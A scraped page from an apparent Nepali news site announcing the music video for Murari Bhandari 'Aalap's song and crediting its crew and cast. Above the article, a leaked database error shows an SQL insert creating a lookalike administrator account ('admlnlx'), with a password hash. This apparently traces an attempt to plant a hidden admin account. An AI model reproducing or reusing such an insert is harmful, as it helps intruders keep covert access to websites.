WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BTnJFUTc8cotmTVQq5T24RAu8fVjjo0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 01:45:16', '', 'admlnlx', 'admlnlx')
काठमाडौ । गायक मुरारी भण्डारी ‘आलाप’ को कहाँ जान लागेकी बोलको गीतको म्युजिक भिडियो सार्वजनकि भएको छ ।
भण्डारीको आफ्नै शब्द शशीविक्रम थापाको संगीत र संयोजन रहेको छ । म्युजकि भिडियोमा संगीतकार स्वयं शशीविक्रम थापाकै निर्देशन रहेको छ । केशब कोइराला र देवराज गुरुङले कोरियोग्राफी गरेका छन । गंगाराम राई र दिपक रायमाझीको छायांकन रहेको भिडियोमा जगदिश अधिकारी, अर्जुन खड्का, मदनकुमार थापा, विक्रम नगरकोटी, सपेन्द्र धिताल, दिपिका थापा, संगीता तामाङ, अनिशा श्रेष्ठ, उषा मगर, दिपीशा दवाडी लगायतका कलाकारको अभिनय रहेको छ । विक्रम गौतमको श्रृंगार रहेको भिडियो डिलाईट्स फिल्मसको अफसियिल युट्युब च्यानलबाट सार्वजानिक गरिएको हो ।